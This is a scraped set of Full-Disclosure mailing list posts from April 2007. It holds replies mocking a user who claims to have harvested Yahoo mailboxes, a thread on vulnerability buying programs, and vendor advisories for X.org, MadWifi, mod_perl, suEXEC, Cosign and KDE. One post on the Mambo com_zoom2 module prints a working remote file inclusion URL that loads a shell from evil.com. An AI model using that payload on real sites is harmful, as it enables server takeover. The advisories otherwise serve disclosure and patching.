Re: [Full-disclosure] [++++SPAM++++] Fwd: threat to corporate security
On 4/10/07, n3td3v [EMAIL PROTECTED] wrote: [...] Do not play with n3td3v's intelligence, we've already harvested mailboxes for Yahoo Inc, we've got internal operational data for Yahoo Inc. Employees are doing more than saying they are out of office or the dates they are coming back, they are openly talking about other stuff as well. Of course I am not questioning the intelligence on anyone. Polite people don't do such thing. I don't know you so I can't judge you, that's all :-) and if I have remarks on that, I don't do them in a public mailing list. It would be simply lame. Still, I found quite strange that you use - in what seems to be a kind of official communication - one of the worst English ever seen (which doesn't testify for professionality. Still bear in mind, I am not judging anyone...) or that you talk in pluralis majestatis like you were the Queen :-) Apart from jokes, what I am questioning is that you really have a clue of such organisations, apart from always pointing your finger to Yahoo - which should have done something to you I guess :-) are you a disgrunted former employee? :-) We will release collect.txt if we need to prove the full scale of the issue. I am not so interested personally .-) Look below for an example: [...] Ok, I trust you that Yahoo is sending their out of office out to the world. Therefore I suggest you to say some corporations or just Yahoo. Cheers -- Marco Ermini Dubium sapientiae initium. (Descartes) [EMAIL PROTECTED] # mount -t life -o ro /dev/dna /genetic/research http://www.markoer.org/ - https://www.linkedin.com/in/marcoermini ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [++++SPAM++++] Fwd: threat to corporate security
On 4/10/07, n3td3v [EMAIL PROTECTED] wrote: We will release collect.txt if we need to prove the full scale of the issue. Are you kidding? This is full disclosure. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hackers uniting against Iran?
On Wed, 2007-04-04 at 15:56 -0500, United Hackers wrote: = Search for products and services at: http://search.mail.com I searched, but found nothing particularly interesting. Did you mean anything specific? -- 4.3 BSD UNIX #1: Fri Jun 6 19:55:29 PDT 1986 Would you like to play a game? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] com_zoom2 Mambo Module Remote File Include Vulnerability
com_zoom2 Mambo Module Remote File Include Vulnerability ## autor:0o_zeus_o0 website:www.diosdelared.com mail:[EMAIL PROTECTED] 10/04/07 ## /components/com_zoom2/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http:/evil.com/shell.gif? include_once($mosConfig_absolute_path/components/com_zoom/classes/iptc/EXIF.php); site download : http://mamboxchange.com/frs/download.php/3740/com_zoom_25_Beta.zip ### ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Application Layer Anti-virus/Firewall
http://www.gnucitizen.org/blog/application-layer-anti-virusfirewall I wrote a small article on application Layer Ant-virus/Firewall solution that I have in mind. I am not sure if that will be useful to anyone but it is still an interesting thing to think about. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cosign SSO Authentication Bypass
Author: Jon Oberheide [EMAIL PROTECTED] Date:Wed, April 11th, 2007 Summary === Application: Cosign Single Sign-On Affected Versions:2.0.1 and previous Vendor Website: http://weblogin.org Type of Vulnerability:Authentication Bypass - Remote Background == cosign is a web single-sign-on system. Written at the University of Michigan, cosign is an open source software project and a part of the National Science Foundation Middleware Initiative (NMI) EDIT software release. cosign is deployed extensively at the University of Michigan and at educational institutions and other organizations around the world. Description === Two critical remote vulnerabilities exist within the CGI component of cosign allowing authentication bypass and impersonation of an arbitrary user. The full details of each vulnerability can be found at the following links: http://www.umich.edu/~umweb/software/cosign/cosign-vuln-2007-001.txt http://www.umich.edu/~umweb/software/cosign/cosign-vuln-2007-002.txt Resolution == Organizations utilizing cosign should upgrade to versions 1.9.4b or 2.0.2a available at http://weblogin.org. -- Jon Oberheide [EMAIL PROTECTED] GnuPG Key: 1024D/F47C17FE Fingerprint: B716 DA66 8173 6EDD 28F6 F184 5842 1C89 F47C 17FE signature.asc Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerability Purchasing Program Questions
Greetings, I would like to see if I could get the community's take on these vulnerability purchasing programs such as those offered by iDefense and 3COM. There have been previous discussions that I have seen on the lists surrounding poor monetary offerings of one program versus that of another. I've also seen people come out and mention they are affiliated with some program that will offer money for these vulnerabilities. This has lead me to a few questions. - Is there a general consensus as to what program is the best? I would imagine this primarily centers on monetary offerings, but I suppose there could be other considerations. - If I normally work with vendors and disclosure vulnerabilities for free, why would I not use one of these programs? I am making the assumption that we are working with a legitimate and responsible buyer. I have no intentions to sell to shady buyers/foreign governments/etc and would like to keep the assumption the buyer is legitimate. - Do we know that the buyers are always legitimate and responsible? Has anyone ever suspected wrongdoing or felt they have been wronged by one of the more popular and legitimate buying services? For example, a submission that was rejected by either party ended up being released by the vendor anyway or integrated into their product. - Any general comments on these sort of programs that are strong towards one way or the other? Thanks, Steven securityzone.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability Purchasing Program Questions
On Wed, 11 Apr 2007 11:59:47 CDT, Steven Adair said: - Is there a general consensus as to what program is the best? This is *highly* dependent on the definition of best. Possible factors: a) Amount of money paid b) How white/black/grey hat the group is c) How under the table they are willing to be - this could be important if you want the bucks but *not* the fame and notoriety Somebody might be willing to accept $10K from a white hat group, but want $25K from a known black/dark grey hat group to cover the added risk of being associated with them if the exploit is used for nefarious purposes, but willing to settle for $20K if the exploit can't be traced back to them. pgpZAfbIYbWJH.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2007:079-1 ] - Updated xorg-x11/XFree86 packages fix integer overflow vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:079-1 http://www.mandriva.com/security/ ___ Package : xorg-x11 Date: April 11, 2007 Affected: 2007.1 ___ Problem Description: Local exploitation of a memory corruption vulnerability in the X.Org and XFree86 X server could allow an attacker to execute arbitrary code with privileges of the X server, typically root. The vulnerability exists in the ProcXCMiscGetXIDList() function in the XC-MISC extension. This request is used to determine what resource IDs are available for use. This function contains two vulnerabilities, both result in memory corruption of either the stack or heap. The ALLOCATE_LOCAL() macro used by this function allocates memory on the stack using alloca() on systems where alloca() is present, or using the heap otherwise. The handler function takes a user provided value, multiplies it, and then passes it to the above macro. This results in both an integer overflow vulnerability, and an alloca() stack pointer shifting vulnerability. Both can be exploited to execute arbitrary code. (CVE-2007-1003) iDefense reported two integer overflows in the way X.org handled various font files. A malicious local user could exploit these issues to potentially execute arbitrary code with the privileges of the X.org server. (CVE-2007-1351, CVE-2007-1352) Multiple integer overflows in (1) the XGetPixel function in ImUtil.c in x.org libx11 before 1.0.3, and (2) XInitImage function in xwd.c for ImageMagick, allow user-assisted remote attackers to cause a denial of service (crash) or information leak via crafted images with large or negative values that trigger a buffer overflow. (CVE-2007-1667) Updated packages are patched to address these issues. Update: Packages for Mandriva Linux 2007.1 are now available. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1003 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1351 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1352 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1667 ___ Updated Packages: Mandriva Linux 2007.1: 094834b9cec06d41814fcfbb4826a1b4 2007.1/i586/libx11-common-1.1.1-2.1mdv2007.1.i586.rpm 60ba6ee2def612bab83b056aa9143c28 2007.1/i586/libx11_6-1.1.1-2.1mdv2007.1.i586.rpm 83832a8b9a359f0199bf0b58024bcc93 2007.1/i586/libx11_6-devel-1.1.1-2.1mdv2007.1.i586.rpm e7f0426150c15b701dca49a131d4f911 2007.1/i586/libx11_6-static-devel-1.1.1-2.1mdv2007.1.i586.rpm 4d737b55208b15a17076ea417fef6e83 2007.1/i586/libxfont1-1.2.7-1.1mdv2007.1.i586.rpm 28b347acb8851ef8cdc9b8b61ffb669b 2007.1/i586/libxfont1-devel-1.2.7-1.1mdv2007.1.i586.rpm aa2e50b1ee6967c2ed3bb8c6dc64c84b 2007.1/i586/libxfont1-static-devel-1.2.7-1.1mdv2007.1.i586.rpm 530b51e76f6b9a0df342719a8b9ddb99 2007.1/i586/x11-server-1.2.0-8.1mdv2007.1.i586.rpm 9d717cb5fab234a4c76a4a0811bf4638 2007.1/i586/x11-server-common-1.2.0-8.1mdv2007.1.i586.rpm 5a47c5a19827c3e820b02c2db7796659 2007.1/i586/x11-server-devel-1.2.0-8.1mdv2007.1.i586.rpm 76a33d69862b1c457a2cec21a37b51d8 2007.1/i586/x11-server-xati-1.2.0-8.1mdv2007.1.i586.rpm 880f19417b5379635ddb6c5f2e612971 2007.1/i586/x11-server-xchips-1.2.0-8.1mdv2007.1.i586.rpm dc8db2e2fa639a5e5590a9301590e58a 2007.1/i586/x11-server-xdmx-1.2.0-8.1mdv2007.1.i586.rpm b71ce20ae5de448b2e54d6458df98526 2007.1/i586/x11-server-xephyr-1.2.0-8.1mdv2007.1.i586.rpm fed1ade3cb4ca74c6362837618a5452c 2007.1/i586/x11-server-xepson-1.2.0-8.1mdv2007.1.i586.rpm 9e3f8d012b49126ee4b217dd24521f29 2007.1/i586/x11-server-xfake-1.2.0-8.1mdv2007.1.i586.rpm 15adb208aac159c1575a3ddd77ffbaee 2007.1/i586/x11-server-xfbdev-1.2.0-8.1mdv2007.1.i586.rpm 37b8f6fdbfca1dc9192758dabd9b5adc 2007.1/i586/x11-server-xgl-0.0.1-0.20070105.4.1mdv2007.1.i586.rpm f8a04c4056025562b4e280a09c5c8577 2007.1/i586/x11-server-xi810-1.2.0-8.1mdv2007.1.i586.rpm ce53fc038ab1f432b216d4057e53057d 2007.1/i586/x11-server-xmach64-1.2.0-8.1mdv2007.1.i586.rpm a6fe363ba43b509661709a3c9245ba8c 2007.1/i586/x11-server-xmga-1.2.0-8.1mdv2007.1.i586.rpm d95d4a1b0b7e9bdee00f7cf90e934a39 2007.1/i586/x11-server-xneomagic-1.2.0-8.1mdv2007.1.i586.rpm 7718f0eabcc0b212012ffb0e5c8e6a26 2007.1/i586/x11-server-xnest-1.2.0-8.1mdv2007.1.i586.rpm 5c06fbc05c7ea8abfdb4ecdeb2ce2d75 2007.1/i586/x11-server-xnvidia-1.2.0-8.1mdv2007.1.i586.rpm aa416e9d9cc207be2c801c4570d43015 2007.1/i586/x11-server-xorg-1.2.0-8.1mdv2007.1.i586.rpm 9076d8da47cfa869a84896cd26722ecc 2007.1/i586/x11-server-xpm2-1.2.0-8.1mdv2007.1.i586.rpm
[Full-disclosure] [ MDKSA-2007:082 ] - Updated madwifi-source, wpa_supplicant packages fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:082 http://www.mandriva.com/security/ ___ Package : madwifi-source Date: April 11, 2007 Affected: 2007.0, 2007.1 ___ Problem Description: The ath_rate_sample function in the ath_rate/sample/sample.c sample code in MadWifi before 0.9.3 allows remote attackers to cause a denial of service (failed KASSERT and system crash) by moving a connected system to a location with low signal strength, and possibly other vectors related to a race condition between interface enabling and packet transmission. (CVE-2005-4835) MadWifi, when Ad-Hoc mode is used, allows remote attackers to cause a denial of service (system crash) via unspecified vectors that lead to a kernel panic in the ieee80211_input function, related to packets coming from a malicious WinXP system. (CVE-2006-7177) MadWifi before 0.9.3 does not properly handle reception of an AUTH frame by an IBSS node, which allows remote attackers to cause a denial of service (system crash) via a certain AUTH frame. (CVE-2006-7178) ieee80211_input.c in MadWifi before 0.9.3 does not properly process Channel Switch Announcement Information Elements (CSA IEs), which allows remote attackers to cause a denial of service (loss of communication) via a Channel Switch Count less than or equal to one, triggering a channel change. (CVE-2006-7179) ieee80211_output.c in MadWifi before 0.9.3 sends unencrypted packets before WPA authentication succeeds, which allows remote attackers to obtain sensitive information (related to network structure), and possibly cause a denial of service (disrupted authentication) and conduct spoofing attacks. (CVE-2006-7180) Updated packages have been updated to 0.9.3 to correct this issue. Wpa_supplicant is built using madwifi-source and has been rebuilt using 0.9.3 source. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4835 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7177 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7178 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7179 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7180 ___ Updated Packages: Mandriva Linux 2007.0: d7cbe028e271f0f8d774905558e74fdc 2007.0/i586/madwifi-source-0.9.3-1.1mdv2007.0.noarch.rpm 904a90761313b1cc56d6a0ff0d477ad7 2007.0/i586/wpa_gui-0.5.5-2.1mdv2007.0.i586.rpm 052bfcc81003cc8b6656434e4611a521 2007.0/i586/wpa_supplicant-0.5.5-2.1mdv2007.0.i586.rpm aaec8f2686274bd944a2a0932180a91d 2007.0/SRPMS/madwifi-source-0.9.3-1.1mdv2007.0.src.rpm 8b9dad3443aab464e3f32bdf6e5e4ab6 2007.0/SRPMS/wpa_supplicant-0.5.5-2.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: d7cbe028e271f0f8d774905558e74fdc 2007.0/x86_64/madwifi-source-0.9.3-1.1mdv2007.0.noarch.rpm 286aebce2515abdf2ce786d568ca561a 2007.0/x86_64/wpa_gui-0.5.5-2.1mdv2007.0.x86_64.rpm b65aa19f1f3f3e54fe1417e01efa0618 2007.0/x86_64/wpa_supplicant-0.5.5-2.1mdv2007.0.x86_64.rpm aaec8f2686274bd944a2a0932180a91d 2007.0/SRPMS/madwifi-source-0.9.3-1.1mdv2007.0.src.rpm 8b9dad3443aab464e3f32bdf6e5e4ab6 2007.0/SRPMS/wpa_supplicant-0.5.5-2.1mdv2007.0.src.rpm Mandriva Linux 2007.1: b1516928d8a7912697ed745a4c7d7e92 2007.1/i586/madwifi-source-0.9.3-1.1mdv2007.1.noarch.rpm f8f1afbd019cee7198980cea27f51888 2007.1/i586/wpa_gui-0.5.7-1.1mdv2007.1.i586.rpm 1b6c006280fc9e489367a33277aedec2 2007.1/i586/wpa_supplicant-0.5.7-1.1mdv2007.1.i586.rpm 5cfe8a50972bc71713aeec6e3fd16477 2007.1/SRPMS/madwifi-source-0.9.3-1.1mdv2007.1.src.rpm 39d7ca78f1476cf4cc1e9424b839687d 2007.1/SRPMS/wpa_supplicant-0.5.7-1.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: b1516928d8a7912697ed745a4c7d7e92 2007.1/x86_64/madwifi-source-0.9.3-1.1mdv2007.1.noarch.rpm f2d503a7c9c75a2e7a893bf9ac21b67d 2007.1/x86_64/wpa_gui-0.5.7-1.1mdv2007.1.x86_64.rpm cab5de7a034f25e3a1135ebb4baf540a 2007.1/x86_64/wpa_supplicant-0.5.7-1.1mdv2007.1.x86_64.rpm 5cfe8a50972bc71713aeec6e3fd16477 2007.1/SRPMS/madwifi-source-0.9.3-1.1mdv2007.1.src.rpm 39d7ca78f1476cf4cc1e9424b839687d 2007.1/SRPMS/wpa_supplicant-0.5.7-1.1mdv2007.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update
[Full-disclosure] [ MDKSA-2007:083 ] - Updated apache-mod_perl packages fix DoS vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:083 http://www.mandriva.com/security/ ___ Package : apache-mod_perl Date: April 11, 2007 Affected: 2006.0, 2007.0, 2007.1, Corporate 3.0, Corporate 4.0 ___ Problem Description: PerlRun.pm in Apache mod_perl 1.30 and earlier, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI. Updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1349 ___ Updated Packages: Mandriva Linux 2006.0: 36fc6ebd1647bf1cd0d404f19342ad7e 2006.0/i586/apache-mod_perl-2.0.54_2.0.1-6.1.20060mdk.i586.rpm 02dce36084140d70e829e47d960ea576 2006.0/i586/apache-mod_perl-devel-2.0.54_2.0.1-6.1.20060mdk.i586.rpm 0b880a7578f7f0d4378f9e21204696c9 2006.0/SRPMS/apache-mod_perl-2.0.54_2.0.1-6.1.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: fa69d3b6658b440e244404c8a27dc31a 2006.0/x86_64/apache-mod_perl-2.0.54_2.0.1-6.1.20060mdk.x86_64.rpm e2cd324ddefb059d9e15c7cf29378dd6 2006.0/x86_64/apache-mod_perl-devel-2.0.54_2.0.1-6.1.20060mdk.x86_64.rpm 0b880a7578f7f0d4378f9e21204696c9 2006.0/SRPMS/apache-mod_perl-2.0.54_2.0.1-6.1.20060mdk.src.rpm Mandriva Linux 2007.0: a5144771fa71b818e2d89f8c417c5243 2007.0/i586/apache-mod_perl-2.0.2-8.1mdv2007.0.i586.rpm a165f6820d6c1ffd2cfc671aa2a44310 2007.0/i586/apache-mod_perl-devel-2.0.2-8.1mdv2007.0.i586.rpm a3829703a55a306a1132d496e63ec652 2007.0/SRPMS/apache-mod_perl-2.0.2-8.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: af928b60d4291c583bad0f4c04ca6169 2007.0/x86_64/apache-mod_perl-2.0.2-8.1mdv2007.0.x86_64.rpm e54445500f5ca4a28a3a4bbb2223d792 2007.0/x86_64/apache-mod_perl-devel-2.0.2-8.1mdv2007.0.x86_64.rpm a3829703a55a306a1132d496e63ec652 2007.0/SRPMS/apache-mod_perl-2.0.2-8.1mdv2007.0.src.rpm Mandriva Linux 2007.1: e52c43b0f7a66915e4c76aae38d3877b 2007.1/i586/apache-mod_perl-2.0.3-3.1mdv2007.1.i586.rpm 01fcca2beb3f2c79d9f4ac8aae13c631 2007.1/i586/apache-mod_perl-devel-2.0.3-3.1mdv2007.1.i586.rpm 3d752f5e1d08baf118da6ce8407a4ee7 2007.1/SRPMS/apache-mod_perl-2.0.3-3.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: e969fb39acb7ce53cf8528fbc6283a9d 2007.1/x86_64/apache-mod_perl-2.0.3-3.1mdv2007.1.x86_64.rpm 4d43ab40be1bd7b404866ae0af6e2663 2007.1/x86_64/apache-mod_perl-devel-2.0.3-3.1mdv2007.1.x86_64.rpm 3d752f5e1d08baf118da6ce8407a4ee7 2007.1/SRPMS/apache-mod_perl-2.0.3-3.1mdv2007.1.src.rpm Corporate 3.0: e5e446755e5b3b403e573ee356bd01be corporate/3.0/i586/HTML-Embperl-1.3.29_1.3.6-3.2.C30mdk.i586.rpm 1399d977fdae6085bc59102b8577c052 corporate/3.0/i586/apache-mod_perl-1.3.29_1.29-3.2.C30mdk.i586.rpm c49b2f2564a381aa22dd02b9d4f7c607 corporate/3.0/i586/apache2-mod_perl-2.0.48_1.99_11-3.1.C30mdk.i586.rpm f2534e8cd62267e0cfffb147323e816c corporate/3.0/i586/apache2-mod_perl-devel-2.0.48_1.99_11-3.1.C30mdk.i586.rpm cd85d71d94598d066a912b57ea8b1534 corporate/3.0/i586/mod_perl-common-1.3.29_1.29-3.2.C30mdk.i586.rpm 32700fd599acc6d2e012f00155586bc1 corporate/3.0/i586/mod_perl-devel-1.3.29_1.29-3.2.C30mdk.i586.rpm 0ff32be9c7e314b93142b25c0ccfc3ff corporate/3.0/SRPMS/apache-mod_perl-1.3.29_1.29-3.2.C30mdk.src.rpm 672b33503464c59bdda5025f1004ab0b corporate/3.0/SRPMS/apache2-mod_perl-2.0.48_1.99_11-3.1.C30mdk.src.rpm Corporate 3.0/X86_64: afc8e04510079792d9bf6a2c43dad3cf corporate/3.0/x86_64/HTML-Embperl-1.3.29_1.3.6-3.2.C30mdk.x86_64.rpm 35977f84e3a1ce37e0f5a50814675c7a corporate/3.0/x86_64/apache-mod_perl-1.3.29_1.29-3.2.C30mdk.x86_64.rpm a8c7bd9351bcc6c83b204646df7bffdd corporate/3.0/x86_64/apache2-mod_perl-2.0.48_1.99_11-3.1.C30mdk.x86_64.rpm 397ad0e9ea70f6f0bcdae436b7dd4e53 corporate/3.0/x86_64/apache2-mod_perl-devel-2.0.48_1.99_11-3.1.C30mdk.x86_64.rpm 42c4e59c5174e84b7b7659de0f6d0b3e corporate/3.0/x86_64/mod_perl-common-1.3.29_1.29-3.2.C30mdk.x86_64.rpm 7acc7a6c50b41a4c9900910a0c1b3ec0 corporate/3.0/x86_64/mod_perl-devel-1.3.29_1.29-3.2.C30mdk.x86_64.rpm 0ff32be9c7e314b93142b25c0ccfc3ff corporate/3.0/SRPMS/apache-mod_perl-1.3.29_1.29-3.2.C30mdk.src.rpm 672b33503464c59bdda5025f1004ab0b corporate/3.0/SRPMS/apache2-mod_perl-2.0.48_1.99_11-3.1.C30mdk.src.rpm Corporate 4.0: c7dbc8d2b1f4a7959cc8ba28b229512c corporate/4.0/i586/apache-mod_perl-2.0.2-8.1.20060mlcs4.i586.rpm 88e16a7e0755a3a1fe987f6f2c44336c corporate/4.0/i586/apache-mod_perl-devel-2.0.2-8.1.20060mlcs4.i586.rpm
[Full-disclosure] iDefense Security Advisory 04.11.07: Apache HTTPD suEXEC Multiple Vulnerabilities
Apache HTTPD suEXEC Multiple Vulnerabilities
iDefense Security Advisory 04.11.07
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 11, 2007
I. BACKGROUND
The suexec binary is a helper application which is part of the Apache
HTTP server package. It is designed to allow a script to run with the
privileges of the owner of the script instead the privileges of the
server. More information about the suexec utility can be found at the
following URL.
http://httpd.apache.org/docs/2.0/suexec.html
II. DESCRIPTION
Local exploitation of multiple vulnerabilities within Apache Software
Foundation's suexec utility could allow an attacker to execute
arbitrary code as another user.
1) Path Checking Race Condition Vulnerabilities
One race condition occurs between the obtaining the current directory
and changing to that directory. Another race condition occurs between
changing to a directory and checking that the directory is not a link.
The directory structure may change between each of these operations,
which can lead to the lstat() being performed on an arbitrary directory
chosen by an attacker. These may be exploited with by renaming a parent
directory, or by using symbolic links.
A third race condition occurs between the final symbolic link check and
executing the target binary. The directory structure may change between
these calls, rendering the symbolic link check ineffective.
2) Path Checking Design Error Vulnerabilities
The suexec utility uses a strncmp() to check whether the current
directory is a sub-directory of the document root directory. This check
will succeed in situations where there exists a directory which begins
with the same sequence, but contains extra content. For example, if the
document root is /var/www/html, the test will also succeed for
/var/www/html_backup and /var/www/htmleditor. A correct test would
also perform a check that the next character is a trailing
null-terminator or directory separator.
A check performed does not verify whether a path to the CGI script (cmd)
is a regular file or not. If the path is pointing at a sub-directory
owned by the appropriate user and group, and the parent directory is
owned by the appropriate user and group, it will be accepted.
3) Arbitrary Group Id Input Validation Vulnerability
Due to a design error, the suexec binary permits any combination of
user/group values taken from command line parameters even if the user
is not a member of the specified group. This may be exploited in
combination with other vulnerabilities if the /proc file system is
mounted. Each time suexec drops its privileges and changes its UID and
GID, all files and directories under /proc/{PID} change their owner to
the corresponding values. As the suexec process changes its UID and GID
unconditionally, creating arbitrary UID and GID owned files is trivial.
III. ANALYSIS
Exploitation of these vulnerabilities would allow a local attacker to
execute arbitrary code with the privileges of another user.
In order to exploit this vulnerability, the user must already have
access to execute the suexec binary. The suexec binary is only able to
be executed by the same user as the web server, typically user 'httpd',
'apache' or 'nobody'. It may be possible to gain access to this user by
exploiting a CGI program, PHP script or other program on the server.
The binary also limits the users it will execute code as to those which
have user and group IDs greater than or equal to AP_UID_MIN and
AP_GID_MIN values respectively. These values are compiled into the
executable.
These factors somewhat mitigate the severity of the problem.
IV. DETECTION
iDefense has confirmed the existence of these vulnerabilities in the
suexec binary distributed with the version 2.2.3 of the Apache httpd in
Red Hat Inc.'s Fedora Core 4. This distribution is not vulnerable in the
default configuration, as exploitation requires additional, but common,
configuration changes to be made to the system.
It is suspected that all previous versions of suexec are vulnerable,
including the 1.3.x versions.
V. WORKAROUND
If the suexec binary is not required for normal operation, remove the
set-uid bit from the file as shown below.
# chmod -s /path/to/suexec
VI. VENDOR RESPONSE
The Apache Software Foundation HTTPD team declined to address the
vulnerabilities and instead provided the following vendor statement.
The attacks described rely on an insecure server configuration - that
the unprivileged user the server runs as has write access to the
document root. The suexec tool cannot detect all possible insecure
configurations, nor can it protect against privilege escalation in
all such cases.
It is important to note that to be able to invoke suexec, the attacker
must also first gain the ability to execute arbitrary code as the
unprivileged server user.
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-1741 to this issue. This is a candidate for
[Full-disclosure] [USN-452-1] KDE library vulnerability
=== Ubuntu Security Notice USN-452-1 April 11, 2007 kdelibs, qt-x11-free vulnerability CVE-2007-0242 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: kdelibs4c2 4:3.4.3-0ubuntu2.4 libqt3-mt3:3.3.4-8ubuntu5.2 Ubuntu 6.06 LTS: kdelibs4c2a 4:3.5.2-0ubuntu18.4 libqt3-mt3:3.3.6-1ubuntu6.2 Ubuntu 6.10: kdelibs4c2a 4:3.5.5-0ubuntu3.4 libqt3-mt3:3.3.6-3ubuntu3.1 After a standard system upgrade you need to restart your session or reboot your computer to effect the necessary changes. Details follow: The Qt library did not correctly handle truncated UTF8 strings, which could cause some applications to incorrectly filter malicious strings. If a Konqueror user were tricked into visiting a web site containing specially crafted strings, normal XSS prevention could be bypassed allowing a remote attacker to steal confidential data. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.4.3-0ubuntu2.4.diff.gz Size/MD5: 331260 14f4a843208f2b72170515c1c06228a4 http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.4.3-0ubuntu2.4.dsc Size/MD5: 1523 62ab5c94f93587394acf16024009dd02 http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.4.3.orig.tar.gz Size/MD5: 19981388 36e7a8320bd95760b41c4849da170100 http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt-x11-free_3.3.4-8ubuntu5.2.diff.gz Size/MD5:79606 def97d0dfafb379accc7a1af41f17e85 http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt-x11-free_3.3.4-8ubuntu5.2.dsc Size/MD5: 1791 79af506f9535905e028c8e797235019f http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt-x11-free_3.3.4.orig.tar.gz Size/MD5: 17422638 9b327962af5a1799fd31b7a576948ad5 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-data_3.4.3-0ubuntu2.4_all.deb Size/MD5: 6970748 978f6f52b6fc59a493dc2d1e847c08cf http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-doc_3.4.3-0ubuntu2.4_all.deb Size/MD5: 29297130 f0c9cb85541c275bd12f51ea86bef457 http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.4.3-0ubuntu2.4_all.deb Size/MD5:30864 5c9cbfe2f9729fd6e8304054f05c4825 http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3-i18n_3.3.4-8ubuntu5.2_all.deb Size/MD5:96662 dd2441f97ca62d5b20ec44f2cb426d12 http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt3-doc_3.3.4-8ubuntu5.2_all.deb Size/MD5: 5425778 4e1dabf0463b01a7b62c838d486eb6ae http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/qt3-examples_3.3.4-8ubuntu5.2_all.deb Size/MD5: 1557390 0084af561924421a40162681037475d7 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-bin_3.4.3-0ubuntu2.4_amd64.deb Size/MD5: 926822 56c338f6cfbf1573ce8c8bb7f8d1ca18 http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-dev_3.4.3-0ubuntu2.4_amd64.deb Size/MD5: 1309200 b3cf96e472204472b880b35938a30cc9 http://security.ubuntu.com/ubuntu/pool/universe/k/kdelibs/kdelibs4c2-dbg_3.4.3-0ubuntu2.4_amd64.deb Size/MD5: 22556454 94d9327a94eb8fb02c92b734aa6841ac http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4c2_3.4.3-0ubuntu2.4_amd64.deb Size/MD5: 9109406 612b6703542a17bb5b00251bebc5d2a0 http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.4-8ubuntu5.2_amd64.deb Size/MD5:82664 429f9e651bae85b13a5abae05902b0ac http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-headers_3.3.4-8ubuntu5.2_amd64.deb Size/MD5: 354928 